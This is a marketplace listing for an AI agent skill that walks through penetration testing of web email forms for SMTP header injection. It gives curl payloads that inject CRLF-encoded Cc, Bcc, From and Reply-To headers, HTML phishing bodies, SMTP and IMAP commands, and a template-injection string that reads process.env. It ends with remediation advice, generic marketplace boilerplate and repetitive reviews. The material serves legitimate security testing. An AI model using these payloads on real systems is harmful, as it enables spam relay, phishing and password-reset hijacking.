testing-for-email-header-injection▌
mukul975/Anthropic-Cybersecurity-Skills · updated May 25, 2026
MDX-style export adds YAML metadata + attribution linking explainx.ai and this canonical listing URL.
Test web application email functionality for SMTP header injection vulnerabilities that allow attackers to inject additional email headers, modify recipients, and abuse contact forms for spam relay.
| name | testing-for-email-header-injection |
| description | Test web application email functionality for SMTP header injection vulnerabilities that allow attackers to inject additional email headers, modify recipients, and abuse contact forms for spam relay. |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | - email-injection - smtp-injection - crlf-injection - header-injection - spam-relay - contact-form - email-security |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - PR.PS-01 - ID.RA-01 - PR.DS-10 - DE.CM-01 |
Testing for Email Header Injection
When to Use
- When testing contact forms, feedback forms, or "email a friend" functionality
- During assessment of password reset email functionality
- When testing newsletter subscription or notification email systems
- During penetration testing of applications that send emails based on user input
- When auditing email-related API endpoints for header injection
Prerequisites
- Burp Suite for intercepting and modifying HTTP requests
- Understanding of SMTP protocol and email header structure
- Knowledge of CRLF injection techniques (\r\n sequences)
- Test email accounts for receiving injected emails
- Access to application features that trigger email sending
- SMTP server logs access for monitoring injection attempts
Workflow
Step 1 — Identify Email Injection Points
# Identify form fields that end up in email headers:
# - "From" name or email address fields
# - "To" or "CC" fields in sharing features
# - Subject line inputs
# - Reply-To fields
# Common endpoints:
# POST /contact - Contact forms
# POST /share - Share via email features
# POST /invite - Invitation systems
# POST /api/send-email - Email API endpoints
# POST /forgot-password - Password reset forms
# Test basic functionality first
curl -X POST http://target.com/contact \
-d "name=Test&[email protected]&subject=Hello&message=Test message"
Step 2 — Test for CRLF Header Injection
# Inject additional email headers via CRLF in the email field
curl -X POST http://target.com/contact \
-d "name=Test&[email protected]%0ACc:[email protected]&message=Test"
# Inject BCC header
curl -X POST http://target.com/contact \
-d "name=Test&[email protected]%0ABcc:[email protected]&message=Test"
# Inject via the name field
curl -X POST http://target.com/contact \
-d "name=Test%0ACc:[email protected]&[email protected]&message=Test"
# Inject via subject field
curl -X POST http://target.com/contact \
-d "name=Test&[email protected]&subject=Hello%0ABcc:[email protected]&message=Test"
# Try different CRLF encoding variants
# %0D%0A (CRLF)
curl -X POST http://target.com/contact \
-d "[email protected]%0D%0ACc:[email protected]"
# %0A (LF only)
curl -X POST http://target.com/contact \
-d "[email protected]%0ACc:[email protected]"
# %0D (CR only)
curl -X POST http://target.com/contact \
-d "[email protected]%0DCc:[email protected]"
# Double encoding
curl -X POST http://target.com/contact \
-d "[email protected]%250ACc:[email protected]"
Step 3 — Inject Custom Email Content
# Override email body by injecting Content-Type and body
curl -X POST http://target.com/contact \
-d "[email protected]%0AContent-Type:text/html%0A%0A<h1>Phishing</h1>"
# Inject additional MIME parts
curl -X POST http://target.com/contact \
-d "[email protected]%0AContent-Type:multipart/mixed;boundary=boundary123%0A--boundary123%0AContent-Type:text/html%0A%0A<script>alert(1)</script>"
# Override From header for email spoofing
curl -X POST http://target.com/contact \
-d "[email protected]%0AFrom:[email protected]"
# Inject Reply-To for phishing
curl -X POST http://target.com/contact \
-d "[email protected]%0AReply-To:[email protected]"
Step 4 — Test IMAP/SMTP Injection
# IMAP command injection via email field
curl -X POST http://target.com/webmail/search \
-d "query=test%0AEXAMINE INBOX"
# SMTP command injection
curl -X POST http://target.com/api/send \
-d "[email protected]%0ARCPT TO:[email protected]"
# SMTP VRFY command injection
curl -X POST http://target.com/api/verify \
-d "[email protected]%0AVRFY admin"
# Test SMTP relay abuse
curl -X POST http://target.com/contact \
-d "[email protected]%0ATo:[email protected]%0ATo:[email protected]%0ATo:[email protected]"
Step 5 — Test JSON-Based Email APIs
# JSON API header injection
curl -X POST http://target.com/api/send-email \
-H "Content-Type: application/json" \
-d '{"to":"[email protected]\nCc:[email protected]","subject":"Test","body":"Test"}'
# Array injection for multiple recipients
curl -X POST http://target.com/api/send-email \
-H "Content-Type: application/json" \
-d '{"to":["[email protected]","[email protected]"],"subject":"Test","body":"Test"}'
# Template injection in email body
curl -X POST http://target.com/api/send-email \
-H "Content-Type: application/json" \
-d '{"to":"[email protected]","subject":"Test","body":"{{constructor.constructor(\"return process.env\")()}}"}'
Step 6 — Validate Findings
# Check if injected CC/BCC emails were received
# Monitor [email protected] inbox for received copies
# Verify header injection via email raw source
# In received email, check "View Original" or "Show Headers"
# Look for injected Cc:, Bcc:, From:, or Reply-To: headers
# Test if the application is usable as a spam relay
# by injecting multiple recipients in BCC
# Document the full injection chain
# 1. Injection point (which field)
# 2. Encoding required (CRLF, URL encoding)
# 3. Impact (spam relay, phishing, data theft)
Key Concepts
| Concept | Description |
|---|---|
| CRLF Injection | Injecting carriage return and line feed characters to create new email headers |
| Header Injection | Adding unauthorized headers (Cc, Bcc, From) to outgoing emails |
| Spam Relay | Abusing email functionality to send spam to arbitrary recipients |
| Email Spoofing | Modifying From or Reply-To headers to impersonate trusted senders |
| MIME Manipulation | Injecting MIME boundaries to override email body content |
| SMTP Command Injection | Injecting raw SMTP commands through unsanitized email parameters |
| Newline Characters | \r\n (CRLF), \n (LF), \r (CR) used to separate email headers |
Tools & Systems
| Tool | Purpose |
|---|---|
| Burp Suite | HTTP proxy for modifying email-related form submissions |
| swaks | Swiss Army Knife for SMTP testing and header injection validation |
| OWASP ZAP | Automated scanner with email injection detection |
| mailhog | Local SMTP testing server for capturing injected emails |
| smtp4dev | Development SMTP server for monitoring email injection results |
| Nuclei | Template scanner with email header injection detection templates |
Common Scenarios
- Spam Relay — Inject BCC headers to relay mass emails through the target's SMTP server, bypassing spam filters that trust the sender domain
- Phishing via Contact Form — Modify From and Reply-To headers to send phishing emails appearing to originate from the target organization
- Password Reset Hijack — Inject CC header in password reset flow to receive a copy of reset tokens sent to the victim
- Email Content Override — Inject MIME Content-Type headers to replace legitimate email body with malicious phishing content
- Internal Email Abuse — Use header injection to send emails to internal addresses not normally accessible through the application
Output Format
## Email Header Injection Report
- **Target**: http://target.com/contact
- **Injection Point**: email field in contact form
- **Encoding Required**: URL-encoded LF (%0A)
### Findings
| # | Field | Payload | Result | Severity |
|---|-------|---------|--------|----------|
| 1 | email | [email protected]%0ACc:[email protected] | CC header injected | High |
| 2 | email | [email protected]%0ABcc:[email protected] | BCC header injected | High |
| 3 | name | Test%0AFrom:[email protected] | From spoofing | Medium |
### Remediation
- Validate email addresses with strict regex rejecting newline characters
- Strip \r, \n, and encoded variants from all email-related input
- Use parameterized email APIs that separate headers from data
- Implement rate limiting on email-sending functionality
How to use testing-for-email-header-injection on Cursor
AI-first code editor with Composer
Prerequisites
Before installing skills in Cursor, ensure your development environment meets these requirements:
- ›Cursor installed and configured on your development machine
- ›Node.js version 16.0+ with npm package manager (verify with
node --version) - ›Active project directory or workspace where you want to add testing-for-email-header-injection
Execute installation command
Execute the skills CLI command in your project's root directory to begin installation:
The skills CLI fetches testing-for-email-header-injection from GitHub repository mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
Select Cursor when prompted
The CLI will show a list of available agents. Use arrow keys to navigate and space to select Cursor:
Verify installation
Confirm successful installation by checking the skill directory location:
Reload or restart Cursor to activate testing-for-email-header-injection. Access the skill through slash commands (e.g., /testing-for-email-header-injection) or your agent's skill management interface.
Security & Verification Notice
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your development environment. Always verify the publisher's identity, review recent commits, and test in isolated environments before production deployment.
List & Monetize Your Skill
Submit your Claude Code skill and start earning
Use Cases▌
Task Automation & Efficiency
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Knowledge Enhancement
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Quality Improvement
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
Implementation Guide▌
Prerequisites
- ›Claude Desktop or compatible AI client with skill support
- ›Clear understanding of task or problem to solve
- ›Willingness to iterate and refine outputs
Time Estimate
15-45 minutes depending on use case complexity
Installation Steps
- 1.Install skill using provided installation command
- 2.Test with simple use case relevant to your work
- 3.Evaluate output quality and relevance
- 4.Iterate on prompts to improve results
- 5.Integrate into regular workflow if valuable
Common Pitfalls
- ⚠Expecting perfect results without iteration
- ⚠Not providing enough context in prompts
- ⚠Using skill for tasks outside its intended scope
- ⚠Accepting outputs without review and validation
Best Practices▌
✓ Do
- +Start with clear, specific prompts
- +Provide relevant context and constraints
- +Review and refine all outputs before using
- +Iterate to improve output quality
- +Document successful prompt patterns
✗ Don't
- −Don't use without understanding skill limitations
- −Don't skip validation of outputs
- −Don't share sensitive information in prompts
- −Don't expect skill to replace human judgment
💡 Pro Tips
- ★Be specific about desired format and style
- ★Ask for multiple options to choose from
- ★Request explanations to understand reasoning
- ★Combine AI efficiency with human expertise
When to Use This▌
✓ Use When
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid When
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
Learning Path▌
- 1Familiarize yourself with skill capabilities and limitations
- 2Start with low-risk, non-critical tasks
- 3Progress to more complex and valuable use cases
- 4Build expertise through regular use and experimentation
Discussion
Product Hunt–style comments (not star reviews)- No comments yet — start the thread.
Ratings
4.8★★★★★45 reviews- ★★★★★Liam Ramirez· Dec 12, 2024
testing-for-email-header-injection is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
- ★★★★★Ganesh Mohane· Dec 8, 2024
testing-for-email-header-injection has been reliable in day-to-day use. Documentation quality is above average for community skills.
- ★★★★★Fatima Lopez· Dec 8, 2024
testing-for-email-header-injection reduced setup friction for our internal harness; good balance of opinion and flexibility.
- ★★★★★Anaya Gupta· Dec 8, 2024
Useful defaults in testing-for-email-header-injection — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
- ★★★★★Kofi Jain· Dec 4, 2024
Solid pick for teams standardizing on skills: testing-for-email-header-injection is focused, and the summary matches what you get after install.
- ★★★★★Sakshi Patil· Nov 27, 2024
testing-for-email-header-injection reduced setup friction for our internal harness; good balance of opinion and flexibility.
- ★★★★★Tariq Torres· Nov 27, 2024
testing-for-email-header-injection has been reliable in day-to-day use. Documentation quality is above average for community skills.
- ★★★★★Zaid Chen· Nov 27, 2024
I recommend testing-for-email-header-injection for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
- ★★★★★Yash Thakker· Nov 19, 2024
Solid pick for teams standardizing on skills: testing-for-email-header-injection is focused, and the summary matches what you get after install.
- ★★★★★Zara Anderson· Nov 19, 2024
testing-for-email-header-injection reduced setup friction for our internal harness; good balance of opinion and flexibility.
showing 1-10 of 45